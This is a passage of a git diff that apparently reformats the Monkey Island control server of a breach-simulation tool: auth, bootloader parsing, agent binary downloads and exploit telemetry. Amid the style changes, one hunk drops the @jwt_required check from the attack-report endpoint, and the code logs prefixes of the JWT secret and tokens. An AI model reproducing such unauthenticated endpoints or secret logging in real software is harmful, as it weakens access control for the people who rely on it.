with techniques on reset and nothing on update """ config_json = json.loads(request.data) - if 'reset_attack_matrix' in config_json: + if "reset_attack_matrix" in config_json: AttackConfig.reset_config() return jsonify(configuration=AttackConfig.get_config()) else: - AttackConfig.update_config({'properties': json.loads(request.data)}) + AttackConfig.update_config({"properties": json.loads(request.data)}) AttackConfig.apply_to_monkey_config() return {} diff --git a/monkey/monkey_island/cc/resources/attack/attack_report.py b/monkey/monkey_island/cc/resources/attack/attack_report.py index 779c436c5..72860cab7 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_report.py +++ b/monkey/monkey_island/cc/resources/attack/attack_report.py @@ -9,12 +9,14 @@ __author__ = "VakarisZ" class AttackReport(flask_restful.Resource): - @jwt_required def get(self): - response_content = {'techniques': AttackReportService.get_latest_report()['techniques'], 'schema': SCHEMA} - return current_app.response_class(json.dumps(response_content, - indent=None, - separators=(",", ":"), - sort_keys=False) + "\n", - mimetype=current_app.config['JSONIFY_MIMETYPE']) + response_content = { + "techniques": AttackReportService.get_latest_report()["techniques"], + "schema": SCHEMA, + } + return current_app.response_class( + json.dumps(response_content, indent=None, separators=(",", ":"), sort_keys=False) + + "\n", + mimetype=current_app.config["JSONIFY_MIMETYPE"], + ) diff --git a/monkey/monkey_island/cc/resources/auth/auth.py b/monkey/monkey_island/cc/resources/auth/auth.py index b188955d8..47d68fb1a 100644 --- a/monkey/monkey_island/cc/resources/auth/auth.py +++ b/monkey/monkey_island/cc/resources/auth/auth.py @@ -18,7 +18,9 @@ logger = logging.getLogger(__name__) def init_jwt(app): user_store.UserStore.set_users(env_singleton.env.get_auth_users()) _ = flask_jwt_extended.JWTManager(app) - logger.debug("Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4]) + logger.debug( + "Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4] + ) class Authenticate(flask_restful.Resource): @@ -26,10 +28,11 @@ class Authenticate(flask_restful.Resource): Resource for user authentication. The user provides the username and hashed password and we give them a JWT. See `AuthService.js` file for the frontend counterpart for this code. 
""" + @staticmethod def _authenticate(username, secret): user = user_store.UserStore.username_table.get(username, None) - if user and safe_str_cmp(user.secret.encode('utf-8'), secret.encode('utf-8')): + if user and safe_str_cmp(user.secret.encode("utf-8"), secret.encode("utf-8")): return user def post(self): @@ -47,8 +50,11 @@ class Authenticate(flask_restful.Resource): # If the user and password have been previously registered if self._authenticate(username, secret): access_token = flask_jwt_extended.create_access_token( - identity=user_store.UserStore.username_table[username].id) - logger.debug(f"Created access token for user {username} that begins with {access_token[:4]}") + identity=user_store.UserStore.username_table[username].id + ) + logger.debug( + f"Created access token for user {username} that begins with {access_token[:4]}" + ) return make_response({"access_token": access_token, "error": ""}, 200) else: return make_response({"error": "Invalid credentials"}, 401) diff --git a/monkey/monkey_island/cc/resources/auth/auth_user.py b/monkey/monkey_island/cc/resources/auth/auth_user.py index d75c751ea..2661e7bd0 100644 --- a/monkey/monkey_island/cc/resources/auth/auth_user.py +++ b/monkey/monkey_island/cc/resources/auth/auth_user.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class User(object): diff --git a/monkey/monkey_island/cc/resources/auth/registration.py b/monkey/monkey_island/cc/resources/auth/registration.py index b27116aa9..e5ca99232 100644 --- a/monkey/monkey_island/cc/resources/auth/registration.py +++ b/monkey/monkey_island/cc/resources/auth/registration.py @@ -8,7 +8,7 @@ from monkey_island.cc.environment.user_creds import UserCreds class Registration(flask_restful.Resource): def get(self): - return {'needs_registration': env_singleton.env.needs_registration()} + return {"needs_registration": env_singleton.env.needs_registration()} def post(self): credentials = UserCreds.get_from_json(request.data) diff --git a/monkey/monkey_island/cc/resources/bootloader.py b/monkey/monkey_island/cc/resources/bootloader.py index e722035ae..b228b9eea 100644 --- a/monkey/monkey_island/cc/resources/bootloader.py +++ b/monkey/monkey_island/cc/resources/bootloader.py @@ -11,9 +11,9 @@ class Bootloader(flask_restful.Resource): # Used by monkey. can't secure. 
def post(self, os): - if os == 'linux': + if os == "linux": data = Bootloader._get_request_contents_linux(request.data) - elif os == 'windows': + elif os == "windows": data = Bootloader._get_request_contents_windows(request.data) else: return make_response({"status": "OS_NOT_FOUND"}, 404) @@ -27,10 +27,13 @@ class Bootloader(flask_restful.Resource): @staticmethod def _get_request_contents_linux(request_data: bytes) -> Dict[str, str]: - parsed_data = json.loads(request_data.decode().replace("\"\n", "") - .replace("\n", "") - .replace("NAME=\"", "") - .replace("\":\",", "\":\"\",")) + parsed_data = json.loads( + request_data.decode() + .replace('"\n', "") + .replace("\n", "") + .replace('NAME="', "") + .replace('":",', '":"",') + ) return parsed_data @staticmethod diff --git a/monkey/monkey_island/cc/resources/bootloader_test.py b/monkey/monkey_island/cc/resources/bootloader_test.py index 5db86627c..83d780aa4 100644 --- a/monkey/monkey_island/cc/resources/bootloader_test.py +++ b/monkey/monkey_island/cc/resources/bootloader_test.py @@ -4,52 +4,57 @@ from monkey_island.cc.resources.bootloader import Bootloader class TestBootloader(TestCase): - def test_get_request_contents_linux(self): - data_without_tunnel = b'{"system":"linux", ' \ - b'"os_version":"NAME="Ubuntu"\n", ' \ - b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' \ - b'"hostname":"test-TEST", ' \ - b'"tunnel":false, ' \ - b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' - data_with_tunnel = b'{"system":"linux", ' \ - b'"os_version":"NAME="Ubuntu"\n", ' \ - b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' \ - b'"hostname":"test-TEST", ' \ - b'"tunnel":"192.168.56.1:5002", ' \ - b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + data_without_tunnel = ( + b'{"system":"linux", ' + b'"os_version":"NAME="Ubuntu"\n", ' + b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' + b'"hostname":"test-TEST", ' + b'"tunnel":false, ' + b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + ) + data_with_tunnel = ( + b'{"system":"linux", ' + b'"os_version":"NAME="Ubuntu"\n", ' + b'"glibc_version":"ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23\n", ' + b'"hostname":"test-TEST", ' + b'"tunnel":"192.168.56.1:5002", ' + b'"ips": ["127.0.0.1", "10.0.2.15", "192.168.56.5"]}' + ) result1 = Bootloader._get_request_contents_linux(data_without_tunnel) - self.assertTrue(result1['system'] == "linux") - self.assertTrue(result1['os_version'] == "Ubuntu") - self.assertTrue(result1['glibc_version'] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") - self.assertTrue(result1['hostname'] == "test-TEST") - self.assertFalse(result1['tunnel']) - self.assertTrue(result1['ips'] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) + self.assertTrue(result1["system"] == "linux") + self.assertTrue(result1["os_version"] == "Ubuntu") + self.assertTrue(result1["glibc_version"] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") + self.assertTrue(result1["hostname"] == "test-TEST") + self.assertFalse(result1["tunnel"]) + self.assertTrue(result1["ips"] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) result2 = Bootloader._get_request_contents_linux(data_with_tunnel) - self.assertTrue(result2['system'] == "linux") - self.assertTrue(result2['os_version'] == "Ubuntu") - self.assertTrue(result2['glibc_version'] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") - self.assertTrue(result2['hostname'] == "test-TEST") - self.assertTrue(result2['tunnel'] == "192.168.56.1:5002") - self.assertTrue(result2['ips'] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) + 
self.assertTrue(result2["system"] == "linux") + self.assertTrue(result2["os_version"] == "Ubuntu") + self.assertTrue(result2["glibc_version"] == "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23") + self.assertTrue(result2["hostname"] == "test-TEST") + self.assertTrue(result2["tunnel"] == "192.168.56.1:5002") + self.assertTrue(result2["ips"] == ["127.0.0.1", "10.0.2.15", "192.168.56.5"]) def test_get_request_contents_windows(self): - windows_data = b'{\x00"\x00s\x00y\x00s\x00t\x00e\x00m\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o' \ - b'\x00w\x00s\x00"\x00,\x00 \x00"\x00o\x00s\x00_\x00v\x00e\x00r\x00s\x00i\x00o\x00n' \ - b'\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x008\x00_\x00o\x00r\x00_\x00g\x00r' \ - b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 \x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"' \ - b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006\x00B\x00"' \ - b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e\x00,\x00 ' \ - b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00[\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005' \ - b'\x006\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009' \ - b'\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.' \ - b'\x001\x00"\x00]\x00}\x00' + windows_data = ( + b'{\x00"\x00s\x00y\x00s\x00t\x00e\x00m\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o' + b'\x00w\x00s\x00"\x00,\x00 \x00"\x00o\x00s\x00_\x00v\x00e\x00r\x00s\x00i\x00o\x00n' + b'\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x008\x00_\x00o\x00r\x00_\x00g\x00r' + b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 \x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"' + b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006\x00B\x00"' + b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e\x00,\x00 ' + b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00[\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005' + b'\x006\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009' + b'\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.' 
+ b'\x001\x00"\x00]\x00}\x00' + ) result = Bootloader._get_request_contents_windows(windows_data) - self.assertTrue(result['system'] == "windows") - self.assertTrue(result['os_version'] == "windows8_or_greater") - self.assertTrue(result['hostname'] == "DESKTOP-PJHU36B") - self.assertFalse(result['tunnel']) - self.assertTrue(result['ips'] == ["192.168.56.1", "192.168.249.1", "192.168.217.1"]) + self.assertTrue(result["system"] == "windows") + self.assertTrue(result["os_version"] == "windows8_or_greater") + self.assertTrue(result["hostname"] == "DESKTOP-PJHU36B") + self.assertFalse(result["tunnel"]) + self.assertTrue(result["ips"] == ["192.168.56.1", "192.168.249.1", "192.168.217.1"]) diff --git a/monkey/monkey_island/cc/resources/client_run.py b/monkey/monkey_island/cc/resources/client_run.py index 2396ba9b0..d747cbde6 100644 --- a/monkey/monkey_island/cc/resources/client_run.py +++ b/monkey/monkey_island/cc/resources/client_run.py @@ -5,7 +5,7 @@ from flask import jsonify, request from monkey_island.cc.services.node import NodeService -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/resources/edge.py b/monkey/monkey_island/cc/resources/edge.py index 3d284e82c..4985d8a4d 100644 --- a/monkey/monkey_island/cc/resources/edge.py +++ b/monkey/monkey_island/cc/resources/edge.py @@ -3,12 +3,12 @@ from flask import request from monkey_island.cc.services.edge.displayed_edge import DisplayedEdgeService -__author__ = 'Barak' +__author__ = "Barak" class Edge(flask_restful.Resource): def get(self): - edge_id = request.args.get('id') + edge_id = request.args.get("id") displayed_edge = DisplayedEdgeService.get_displayed_edge_by_id(edge_id) if edge_id: return {"edge": displayed_edge} diff --git a/monkey/monkey_island/cc/resources/environment.py b/monkey/monkey_island/cc/resources/environment.py index 9f9a89105..03333b029 100644 --- a/monkey/monkey_island/cc/resources/environment.py +++ b/monkey/monkey_island/cc/resources/environment.py @@ -12,8 +12,10 @@ logger = logging.getLogger(__name__) class Environment(flask_restful.Resource): def patch(self): env_data = json.loads(request.data) - if env_data['server_config'] == "standard": + if env_data["server_config"] == "standard": if env_singleton.env.needs_registration(): env_singleton.set_to_standard() - logger.warning("No user registered, Island on standard mode - no credentials required to access.") + logger.warning( + "No user registered, Island on standard mode - no credentials required to access." 
+ ) return {} diff --git a/monkey/monkey_island/cc/resources/island_configuration.py b/monkey/monkey_island/cc/resources/island_configuration.py index b8a556016..42730e477 100644 --- a/monkey/monkey_island/cc/resources/island_configuration.py +++ b/monkey/monkey_island/cc/resources/island_configuration.py @@ -10,13 +10,15 @@ from monkey_island.cc.services.config import ConfigService class IslandConfiguration(flask_restful.Resource): @jwt_required def get(self): - return jsonify(schema=ConfigService.get_config_schema(), - configuration=ConfigService.get_config(False, True, True)) + return jsonify( + schema=ConfigService.get_config_schema(), + configuration=ConfigService.get_config(False, True, True), + ) @jwt_required def post(self): config_json = json.loads(request.data) - if 'reset' in config_json: + if "reset" in config_json: ConfigService.reset_config() else: if not ConfigService.update_config(config_json, should_encrypt=True): diff --git a/monkey/monkey_island/cc/resources/island_logs.py b/monkey/monkey_island/cc/resources/island_logs.py index b643f2147..0aa1f6480 100644 --- a/monkey/monkey_island/cc/resources/island_logs.py +++ b/monkey/monkey_island/cc/resources/island_logs.py @@ -16,4 +16,4 @@ class IslandLog(flask_restful.Resource): try: return IslandLogService.get_log_file() except Exception: - logger.error('Monkey Island logs failed to download', exc_info=True) + logger.error("Monkey Island logs failed to download", exc_info=True) diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py index 0758d40c2..021df512a 100644 --- a/monkey/monkey_island/cc/resources/local_run.py +++ b/monkey/monkey_island/cc/resources/local_run.py @@ -15,7 +15,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.resources.monkey_download import get_monkey_executable from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -31,25 +31,28 @@ def run_local_monkey(): if not result: return False, "OS Type not found" - monkey_path = os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'binaries', result['filename']) - target_path = os.path.join(env_singleton.env.get_config().data_dir_abs_path, result['filename']) + monkey_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries", result["filename"]) + target_path = os.path.join(env_singleton.env.get_config().data_dir_abs_path, result["filename"]) # copy the executable to temp path (don't run the monkey from its current location as it may delete itself) try: copyfile(monkey_path, target_path) os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG) except Exception as exc: - logger.error('Copy file failed', exc_info=True) + logger.error("Copy file failed", exc_info=True) return False, "Copy file failed: %s" % exc # run the monkey try: - args = ['"%s" m0nk3y -s %s:%s' % (target_path, local_ip_addresses()[0], env_singleton.env.get_island_port())] + args = [ + '"%s" m0nk3y -s %s:%s' + % (target_path, local_ip_addresses()[0], env_singleton.env.get_island_port()) + ] if sys.platform == "win32": args = "".join(args) subprocess.Popen(args, shell=True).pid except Exception as exc: - logger.error('popen failed', exc_info=True) + logger.error("popen failed", exc_info=True) return False, "popen failed: %s" % exc return True, "" @@ -70,9 +73,9 @@ class LocalRun(flask_restful.Resource): @jwt_required def post(self): body = json.loads(request.data) - if body.get('action') == 'run': + if body.get("action") == "run": 
local_run = run_local_monkey() return jsonify(is_running=local_run[0], error_text=local_run[1]) # default action - return make_response({'error': 'Invalid action'}, 500) + return make_response({"error": "Invalid action"}, 500) diff --git a/monkey/monkey_island/cc/resources/log.py b/monkey/monkey_island/cc/resources/log.py index 0d437d174..aae23fed3 100644 --- a/monkey/monkey_island/cc/resources/log.py +++ b/monkey/monkey_island/cc/resources/log.py @@ -16,8 +16,8 @@ __author__ = "itay.mizeretz" class Log(flask_restful.Resource): @jwt_required def get(self): - monkey_id = request.args.get('id') - exists_monkey_id = request.args.get('exists') + monkey_id = request.args.get("id") + exists_monkey_id = request.args.get("exists") if monkey_id: return LogService.get_log_by_monkey_id(ObjectId(monkey_id)) else: @@ -28,9 +28,9 @@ class Log(flask_restful.Resource): def post(self): telemetry_json = json.loads(request.data) - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])['_id'] + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"])["_id"] # This shouldn't contain any unicode characters. this'll take 2 time less space. - log_data = str(telemetry_json['log']) + log_data = str(telemetry_json["log"]) log_id = LogService.add_log(monkey_id, log_data) return mongo.db.log.find_one_or_404({"_id": log_id}) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 0e6fe0370..9f5c9670b 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -13,7 +13,7 @@ from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.edge.edge import EdgeService from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" # TODO: separate logic from interface @@ -25,11 +25,11 @@ class Monkey(flask_restful.Resource): def get(self, guid=None, **kw): NodeService.update_dead_monkeys() # refresh monkeys status if not guid: - guid = request.args.get('guid') + guid = request.args.get("guid") if guid: monkey_json = mongo.db.monkey.find_one_or_404({"guid": guid}) - monkey_json['config'] = ConfigService.decrypt_flat_config(monkey_json['config']) + monkey_json["config"] = ConfigService.decrypt_flat_config(monkey_json["config"]) return monkey_json return {} @@ -38,23 +38,23 @@ class Monkey(flask_restful.Resource): @TestTelemStore.store_test_telem def patch(self, guid): monkey_json = json.loads(request.data) - update = {"$set": {'modifytime': datetime.now()}} + update = {"$set": {"modifytime": datetime.now()}} monkey = NodeService.get_monkey_by_guid(guid) - if 'keepalive' in monkey_json: - update['$set']['keepalive'] = dateutil.parser.parse(monkey_json['keepalive']) + if "keepalive" in monkey_json: + update["$set"]["keepalive"] = dateutil.parser.parse(monkey_json["keepalive"]) else: - update['$set']['keepalive'] = datetime.now() - if 'config' in monkey_json: - update['$set']['config'] = monkey_json['config'] - if 'config_error' in monkey_json: - update['$set']['config_error'] = monkey_json['config_error'] + update["$set"]["keepalive"] = datetime.now() + if "config" in monkey_json: + update["$set"]["config"] = monkey_json["config"] + if "config_error" in monkey_json: + update["$set"]["config_error"] = monkey_json["config_error"] - if 'tunnel' in monkey_json: - tunnel_host_ip = monkey_json['tunnel'].split(":")[-2].replace("//", "") + if "tunnel" in monkey_json: + tunnel_host_ip = monkey_json["tunnel"].split(":")[-2].replace("//", 
"") NodeService.set_monkey_tunnel(monkey["_id"], tunnel_host_ip) ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS) - update['$set']['ttl_ref'] = ttl.id + update["$set"]["ttl_ref"] = ttl.id return mongo.db.monkey.update({"_id": monkey["_id"]}, update, upsert=False) @@ -63,14 +63,14 @@ class Monkey(flask_restful.Resource): @TestTelemStore.store_test_telem def post(self, **kw): monkey_json = json.loads(request.data) - monkey_json['creds'] = [] - monkey_json['dead'] = False - if 'keepalive' in monkey_json: - monkey_json['keepalive'] = dateutil.parser.parse(monkey_json['keepalive']) + monkey_json["creds"] = [] + monkey_json["dead"] = False + if "keepalive" in monkey_json: + monkey_json["keepalive"] = dateutil.parser.parse(monkey_json["keepalive"]) else: - monkey_json['keepalive'] = datetime.now() + monkey_json["keepalive"] = datetime.now() - monkey_json['modifytime'] = datetime.now() + monkey_json["modifytime"] = datetime.now() ConfigService.save_initial_config_if_needed() @@ -79,47 +79,63 @@ class Monkey(flask_restful.Resource): # Update monkey configuration new_config = ConfigService.get_flat_config(False, False) - monkey_json['config'] = monkey_json.get('config', {}) - monkey_json['config'].update(new_config) + monkey_json["config"] = monkey_json.get("config", {}) + monkey_json["config"].update(new_config) # try to find new monkey parent - parent = monkey_json.get('parent') - parent_to_add = (monkey_json.get('guid'), None) # default values in case of manual run - if parent and parent != monkey_json.get('guid'): # current parent is known - exploit_telem = [x for x in - mongo.db.telemetry.find({'telem_category': {'$eq': 'exploit'}, - 'data.result': {'$eq': True}, - 'data.machine.ip_addr': {'$in': monkey_json['ip_addresses']}, - 'monkey_guid': {'$eq': parent}})] + parent = monkey_json.get("parent") + parent_to_add = (monkey_json.get("guid"), None) # default values in case of manual run + if parent and parent != monkey_json.get("guid"): # current parent is known + exploit_telem = [ + x + for x in mongo.db.telemetry.find( + { + "telem_category": {"$eq": "exploit"}, + "data.result": {"$eq": True}, + "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]}, + "monkey_guid": {"$eq": parent}, + } + ) + ] if 1 == len(exploit_telem): - parent_to_add = (exploit_telem[0].get('monkey_guid'), exploit_telem[0].get('data').get('exploiter')) + parent_to_add = ( + exploit_telem[0].get("monkey_guid"), + exploit_telem[0].get("data").get("exploiter"), + ) else: parent_to_add = (parent, None) - elif (not parent or parent == monkey_json.get('guid')) and 'ip_addresses' in monkey_json: - exploit_telem = [x for x in - mongo.db.telemetry.find({'telem_category': {'$eq': 'exploit'}, - 'data.result': {'$eq': True}, - 'data.machine.ip_addr': {'$in': monkey_json['ip_addresses']}})] + elif (not parent or parent == monkey_json.get("guid")) and "ip_addresses" in monkey_json: + exploit_telem = [ + x + for x in mongo.db.telemetry.find( + { + "telem_category": {"$eq": "exploit"}, + "data.result": {"$eq": True}, + "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]}, + } + ) + ] if 1 == len(exploit_telem): - parent_to_add = (exploit_telem[0].get('monkey_guid'), exploit_telem[0].get('data').get('exploiter')) + parent_to_add = ( + exploit_telem[0].get("monkey_guid"), + exploit_telem[0].get("data").get("exploiter"), + ) if not db_monkey: - monkey_json['parent'] = [parent_to_add] + monkey_json["parent"] = [parent_to_add] else: - monkey_json['parent'] = db_monkey.get('parent') + [parent_to_add] 
+ monkey_json["parent"] = db_monkey.get("parent") + [parent_to_add] tunnel_host_ip = None - if 'tunnel' in monkey_json: - tunnel_host_ip = monkey_json['tunnel'].split(":")[-2].replace("//", "") - monkey_json.pop('tunnel') + if "tunnel" in monkey_json: + tunnel_host_ip = monkey_json["tunnel"].split(":")[-2].replace("//", "") + monkey_json.pop("tunnel") ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS) - monkey_json['ttl_ref'] = ttl.id + monkey_json["ttl_ref"] = ttl.id - mongo.db.monkey.update({"guid": monkey_json["guid"]}, - {"$set": monkey_json}, - upsert=True) + mongo.db.monkey.update({"guid": monkey_json["guid"]}, {"$set": monkey_json}, upsert=True) # Merge existing scanned node with new monkey @@ -128,13 +144,14 @@ class Monkey(flask_restful.Resource): if tunnel_host_ip is not None: NodeService.set_monkey_tunnel(new_monkey_id, tunnel_host_ip) - existing_node = mongo.db.node.find_one({"ip_addresses": {"$in": monkey_json["ip_addresses"]}}) + existing_node = mongo.db.node.find_one( + {"ip_addresses": {"$in": monkey_json["ip_addresses"]}} + ) if existing_node: node_id = existing_node["_id"] - EdgeService.update_all_dst_nodes(old_dst_node_id=node_id, - new_dst_node_id=new_monkey_id) - for creds in existing_node['creds']: + EdgeService.update_all_dst_nodes(old_dst_node_id=node_id, new_dst_node_id=new_monkey_id) + for creds in existing_node["creds"]: NodeService.add_credentials_to_monkey(new_monkey_id, creds) mongo.db.node.remove({"_id": node_id}) diff --git a/monkey/monkey_island/cc/resources/monkey_configuration.py b/monkey/monkey_island/cc/resources/monkey_configuration.py index e6b94cf81..d4e415e88 100644 --- a/monkey/monkey_island/cc/resources/monkey_configuration.py +++ b/monkey/monkey_island/cc/resources/monkey_configuration.py @@ -6,18 +6,21 @@ from flask import abort, jsonify, request from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.config import ConfigService -__author__ = 'Barak' +__author__ = "Barak" class MonkeyConfiguration(flask_restful.Resource): @jwt_required def get(self): - return jsonify(schema=ConfigService.get_config_schema(), configuration=ConfigService.get_config(False, True)) + return jsonify( + schema=ConfigService.get_config_schema(), + configuration=ConfigService.get_config(False, True), + ) @jwt_required def post(self): config_json = json.loads(request.data) - if 'reset' in config_json: + if "reset" in config_json: ConfigService.reset_config() else: if not ConfigService.update_config(config_json, should_encrypt=True): diff --git a/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py b/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py index 552dce51e..f0d7e411f 100644 --- a/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py +++ b/monkey/monkey_island/cc/resources/monkey_control/started_on_island.py @@ -11,6 +11,6 @@ class StartedOnIsland(flask_restful.Resource): # Used by monkey. can't secure. 
def post(self): data = json.loads(request.data) - if data['started_on_island']: + if data["started_on_island"]: ConfigService.set_started_on_island(True) return make_response({}, 200) diff --git a/monkey/monkey_island/cc/resources/monkey_download.py b/monkey/monkey_island/cc/resources/monkey_download.py index c9d3127a4..5620425aa 100644 --- a/monkey/monkey_island/cc/resources/monkey_download.py +++ b/monkey/monkey_island/cc/resources/monkey_download.py @@ -8,64 +8,67 @@ from flask import request, send_from_directory from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) MONKEY_DOWNLOADS = [ { - 'type': 'linux', - 'machine': 'x86_64', - 'filename': 'monkey-linux-64', + "type": "linux", + "machine": "x86_64", + "filename": "monkey-linux-64", }, { - 'type': 'linux', - 'machine': 'i686', - 'filename': 'monkey-linux-32', + "type": "linux", + "machine": "i686", + "filename": "monkey-linux-32", }, { - 'type': 'linux', - 'machine': 'i386', - 'filename': 'monkey-linux-32', + "type": "linux", + "machine": "i386", + "filename": "monkey-linux-32", }, { - 'type': 'linux', - 'filename': 'monkey-linux-64', + "type": "linux", + "filename": "monkey-linux-64", }, { - 'type': 'windows', - 'machine': 'x86', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "machine": "x86", + "filename": "monkey-windows-32.exe", }, { - 'type': 'windows', - 'machine': 'amd64', - 'filename': 'monkey-windows-64.exe', + "type": "windows", + "machine": "amd64", + "filename": "monkey-windows-64.exe", }, { - 'type': 'windows', - 'machine': '64', - 'filename': 'monkey-windows-64.exe', + "type": "windows", + "machine": "64", + "filename": "monkey-windows-64.exe", }, { - 'type': 'windows', - 'machine': '32', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "machine": "32", + "filename": "monkey-windows-32.exe", }, { - 'type': 'windows', - 'filename': 'monkey-windows-32.exe', + "type": "windows", + "filename": "monkey-windows-32.exe", }, ] def get_monkey_executable(host_os, machine): for download in MONKEY_DOWNLOADS: - if host_os == download.get('type') and machine == download.get('machine'): - logger.info('Monkey exec found for os: {0} and machine: {1}'.format(host_os, machine)) + if host_os == download.get("type") and machine == download.get("machine"): + logger.info("Monkey exec found for os: {0} and machine: {1}".format(host_os, machine)) return download - logger.warning('No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}' - .format(host_os, machine)) + logger.warning( + "No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}".format( + host_os, machine + ) + ) return None @@ -73,28 +76,28 @@ class MonkeyDownload(flask_restful.Resource): # Used by monkey. can't secure. def get(self, path): - return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'binaries'), path) + return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries"), path) # Used by monkey. can't secure. 
def post(self): host_json = json.loads(request.data) - host_os = host_json.get('os') + host_os = host_json.get("os") if host_os: - result = get_monkey_executable(host_os.get('type'), host_os.get('machine')) + result = get_monkey_executable(host_os.get("type"), host_os.get("machine")) if result: # change resulting from new base path - executable_filename = result['filename'] + executable_filename = result["filename"] real_path = MonkeyDownload.get_executable_full_path(executable_filename) if os.path.isfile(real_path): - result['size'] = os.path.getsize(real_path) + result["size"] = os.path.getsize(real_path) return result return {} @staticmethod def get_executable_full_path(executable_filename): - real_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", 'binaries', executable_filename) + real_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries", executable_filename) return real_path @staticmethod @@ -102,15 +105,16 @@ class MonkeyDownload(flask_restful.Resource): """ Logs all the hashes of the monkey executables for debugging ease (can check what Monkey version you have etc.). """ - filenames = set([x['filename'] for x in MONKEY_DOWNLOADS]) + filenames = set([x["filename"] for x in MONKEY_DOWNLOADS]) for filename in filenames: filepath = MonkeyDownload.get_executable_full_path(filename) if os.path.isfile(filepath): - with open(filepath, 'rb') as monkey_exec_file: + with open(filepath, "rb") as monkey_exec_file: file_contents = monkey_exec_file.read() - logger.debug("{} hashes:\nSHA-256 {}".format( - filename, - hashlib.sha256(file_contents).hexdigest() - )) + logger.debug( + "{} hashes:\nSHA-256 {}".format( + filename, hashlib.sha256(file_contents).hexdigest() + ) + ) else: logger.debug("No monkey executable for {}.".format(filepath)) diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py index 899dc478c..1dfa14657 100644 --- 